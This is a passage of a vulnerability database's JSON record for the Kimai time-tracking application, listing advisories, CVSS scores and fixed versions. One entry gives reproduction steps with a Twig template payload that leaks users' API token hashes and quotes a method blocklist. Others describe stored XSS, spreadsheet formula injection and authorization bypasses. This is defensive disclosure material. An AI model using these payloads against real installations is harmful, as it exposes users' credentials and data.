system.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-vrqv-52x7-rm4v","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-vrqv-52x7-rm4v"},{"reference_url":"https://github.com/advisories/GHSA-vrqv-52x7-rm4v","reference_id":"GHSA-vrqv-52x7-rm4v","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vrqv-52x7-rm4v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375853?format=json","purl":"pkg:composer/kimai/kimai@2.56.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.56.0"}],"aliases":["GHSA-vrqv-52x7-rm4v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kjkh-andk-qqa6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359952?format=json","vulnerability_id":"VCID-nxtw-3hcs-mydx","summary":"Kimai leaks API Token Hash via Invoice Twig Template\n## Summary\n\nThe Twig sandbox used for invoice templates blocks certain sensitive `User` methods (password, TOTP secret, etc.) via a blocklist in `StrictPolicy::checkMethodAllowed()`. However, `getApiToken()` and `getPlainApiToken()` are not on the blocklist. An admin who creates an invoice template can embed calls to these methods, causing the bcrypt or sodium hashed API password of any user who generates an invoice using that template to be included in the rendered output.\n\nOnly relevant for OnPremise installations with template upload activated.\n\n## Background\n\nKimai allows admins (`ROLE_ADMIN` and above) with the `manage_invoice_template` permission to create Twig-based invoice templates. These templates are rendered in a sandboxed Twig environment with `StrictPolicy` controlling which methods and properties are accessible.\n\n`StrictPolicy` explicitly blocks:\n\n```php\n// src/Twig/SecurityPolicy/StrictPolicy.php:156\nif (\\in_array($lcm, [\n 'getpassword',\n 'gettotpsecret',\n 'getplainpassword',\n 'getconfirmationtoken',\n 'gettotpauthenticationconfiguration'\n], true)) {\n throw new SecurityNotAllowedMethodError(...);\n}\n```\n\n`getApiToken()` and `getPlainApiToken()` are **not** in this list and are freely callable.\n\n## Vulnerable Code\n\n`StrictPolicy.php` — missing entries in the User method blocklist:\n\n```php\n// Current\n['getpassword', 'gettotpsecret', 'getplainpassword', 'getconfirmationtoken', 'gettotpauthenticationconfiguration']\n\n// Should also include:\n'getapitoken', 'getplainapitoken'\n```\n\nThe invoice model passes a `User` object through `model.user`, accessible in any twig invoice template.\n\n## Steps to Reproduce\n\n1. Log in as an admin with the `manage_invoice_template` permission.\n2. Create a new Twig invoice template (HTML or PDF) containing:\n\n```twig\nAPI Token: {{ model.user.getApiToken() }}\nPlain Token: {{ model.user.getPlainApiToken() }}\n```\n\n3. Save the template and set it as the default for a customer.\n4. Log in as a regular user assigned to that customer and generate an invoice.\n5. Observe that the rendered invoice contains the user's API token in plaintext.\n\n## Impact\n\nAn admin can silently embed token-exfiltration code in a shared invoice template. Every user who subsequently generates an invoice using that template will have their hashed API token leaked into the invoice output. \n\n- API passwords are [deprecated since April 2024](https://www.kimai.org/en/changelog/2024/cloud-update-104) and not in wide use anymore (especially by new users)\n- The function `getPlainApiToken()` does NEVER return any data\n- The function `getApiToken()` might return a bcrypt or sodium hashed API password, if the user (who created the invoice) has configured one - this cannot be used, but needs to be cracked using rainbow tables\n- The cloud does not allow Twig template upload, this is only relevant for OnPremise installations with template upload activated\n\n## Fix\n\nThe SecurityPolicy was changed to exclude methods that contains certain trigger words instead of using the hard-coded list, see https://github.com/kimai/kimai/pull/5878 \n\nThis disables access to both the `getApiToken()` and `getPlainApiToken()` function.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/pull/5878","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/pull/5878"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-rh42-6rj2-xwmc","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-rh42-6rj2-xwmc"},{"reference_url":"https://github.com/advisories/GHSA-rh42-6rj2-xwmc","reference_id":"GHSA-rh42-6rj2-xwmc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rh42-6rj2-xwmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["GHSA-rh42-6rj2-xwmc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nxtw-3hcs-mydx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80851?format=json","vulnerability_id":"VCID-qvcx-4wyw-4uba","summary":"Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41498","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.01983","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41498"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41498","reference_id":"","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41498"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.54.0","reference_id":"2.54.0","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:31:51Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.54.0"},{"reference_url":"https://github.com/advisories/GHSA-jv9x-w4gm-hwcm","reference_id":"GHSA-jv9x-w4gm-hwcm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jv9x-w4gm-hwcm"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm","reference_id":"GHSA-jv9x-w4gm-hwcm","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:31:51Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373714?format=json","purl":"pkg:composer/kimai/kimai@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-kjkh-andk-qqa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.54.0"}],"aliases":["CVE-2026-41498","GHSA-jv9x-w4gm-hwcm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qvcx-4wyw-4uba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/66917?format=json","vulnerability_id":"VCID-vz3c-4twe-ffgv","summary":"Kimai is a web-based multi-user time-tracking application. Prior to version 2.46.0, Kimai's export functionality uses a Twig sandbox with an overly permissive security policy (`DefaultPolicy`) that allows arbitrary method calls on objects available in the template context. An authenticated user with export permissions can deploy a malicious Twig template that extracts sensitive information including environment variables, all user password hashes, serialized session tokens, and CSRF tokens. Version 2.46.0 patches this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23626","reference_id":"","reference_type":"","scores":[{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22487","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23626"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://twig.symfony.com/doc/3.x/api.html#sandbox-extension","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://twig.symfony.com/doc/3.x/api.html#sandbox-extension"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.46.0","reference_id":"2.46.0","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.46.0"},{"reference_url":"https://github.com/kimai/kimai/pull/5757","reference_id":"5757","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/pull/5757"},{"reference_url":"https://github.com/kimai/kimai/commit/6a86afb5fd79f6c1825060b87c09bd1909c2e86f","reference_id":"6a86afb5fd79f6c1825060b87c09bd1909c2e86f","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/commit/6a86afb5fd79f6c1825060b87c09bd1909c2e86f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23626","reference_id":"CVE-2026-23626","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23626"},{"reference_url":"https://github.com/advisories/GHSA-jg2j-2w24-54cg","reference_id":"GHSA-jg2j-2w24-54cg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jg2j-2w24-54cg"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-jg2j-2w24-54cg","reference_id":"GHSA-jg2j-2w24-54cg","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-jg2j-2w24-54cg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/37913?format=json","purl":"pkg:composer/kimai/kimai@2.46.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-8vkc-r8z8-7ugb"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kahk-zqmm-zka9"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-nxtw-3hcs-mydx"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"},{"vulnerability":"VCID-ys8u-pn7h-ayc7"},{"vulnerability":"VCID-zfjd-s5wk-eqbz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.46.0"}],"aliases":["CVE-2026-23626","GHSA-jg2j-2w24-54cg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vz3c-4twe-ffgv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70317?format=json","vulnerability_id":"VCID-we4j-21ku-9yf2","summary":"Kimai is an open-source time tracking application. From version 2.27.0 to before version 2.54.0, any ROLE_USER can create a tag with a formula string as its name (e.g. =SUM(54+51)) via POST /api/tags and assign it to a timesheet. When an admin exports timesheets to XLSX, ArrayFormatter.formatValue() joins tag names with implode() and returns the result unchanged. OpenSpout promotes any =-prefixed string to a FormulaCell, writing SUM(54+51) into the XLSX archive. Excel evaluates the formula when the file is opened. This issue has been patched in version 2.54.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42267","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11933","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42267"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42267","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42267"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.54.0","reference_id":"2.54.0","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T12:57:49Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.54.0"},{"reference_url":"https://github.com/advisories/GHSA-3xc2-h5r3-wv3r","reference_id":"GHSA-3xc2-h5r3-wv3r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3xc2-h5r3-wv3r"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-3xc2-h5r3-wv3r","reference_id":"GHSA-3xc2-h5r3-wv3r","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T12:57:49Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-3xc2-h5r3-wv3r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373714?format=json","purl":"pkg:composer/kimai/kimai@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-kjkh-andk-qqa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.54.0"}],"aliases":["CVE-2026-42267","GHSA-3xc2-h5r3-wv3r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-we4j-21ku-9yf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84182?format=json","vulnerability_id":"VCID-ys8u-pn7h-ayc7","summary":"Kimai is an open-source time tracking application. In versions 1.16.3 through 2.52.0, the escapeForHtml() function in KimaiEscape.js does not escape double quote or single quote characters. When a user's profile alias is inserted into an HTML attribute context via the team member form prototype and rendered through innerHTML, this incomplete escaping allows HTML attribute injection. An authenticated user with ROLE_USER privileges can store a malicious alias that executes JavaScript in the browser of any administrator viewing the team form, resulting in stored XSS with privilege escalation. This issue has been fixed in version 2.53.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40479","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01649","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40479"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/pull/2959","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/pull/2959"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40479","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40479"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.53.0","reference_id":"2.53.0","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:09:41Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.53.0"},{"reference_url":"https://github.com/advisories/GHSA-g82g-m9vx-vhjg","reference_id":"GHSA-g82g-m9vx-vhjg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-g82g-m9vx-vhjg"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-g82g-m9vx-vhjg","reference_id":"GHSA-g82g-m9vx-vhjg","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:09:41Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-g82g-m9vx-vhjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["CVE-2026-40479","GHSA-g82g-m9vx-vhjg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ys8u-pn7h-ayc7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84278?format=json","vulnerability_id":"VCID-zfjd-s5wk-eqbz","summary":"Kimai is an open-source time tracking application. In versions 2.52.0 and below, the User Preferences API endpoint (PATCH /api/users/{id}/preferences) applies submitted preference values without checking the isEnabled() flag on preference objects. Although the hourly_rate and internal_rate fields are correctly marked as disabled for users lacking the hourly-rate role permission, the API ignores this restriction and saves the values directly. Any authenticated user can modify their own billing rates through this endpoint, resulting in unauthorized financial tampering affecting invoices and timesheet calculations. This issue has been fixed in version 2.53.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40486","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05834","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40486"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40486","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40486"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.53.0","reference_id":"2.53.0","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:42:34Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.53.0"},{"reference_url":"https://github.com/advisories/GHSA-qh43-xrjm-4ggp","reference_id":"GHSA-qh43-xrjm-4ggp","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qh43-xrjm-4ggp"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-qh43-xrjm-4ggp","reference_id":"GHSA-qh43-xrjm-4ggp","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:42:34Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-qh43-xrjm-4ggp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["CVE-2026-40486","GHSA-qh43-xrjm-4ggp"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zfjd-s5wk-eqbz"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.41.0"}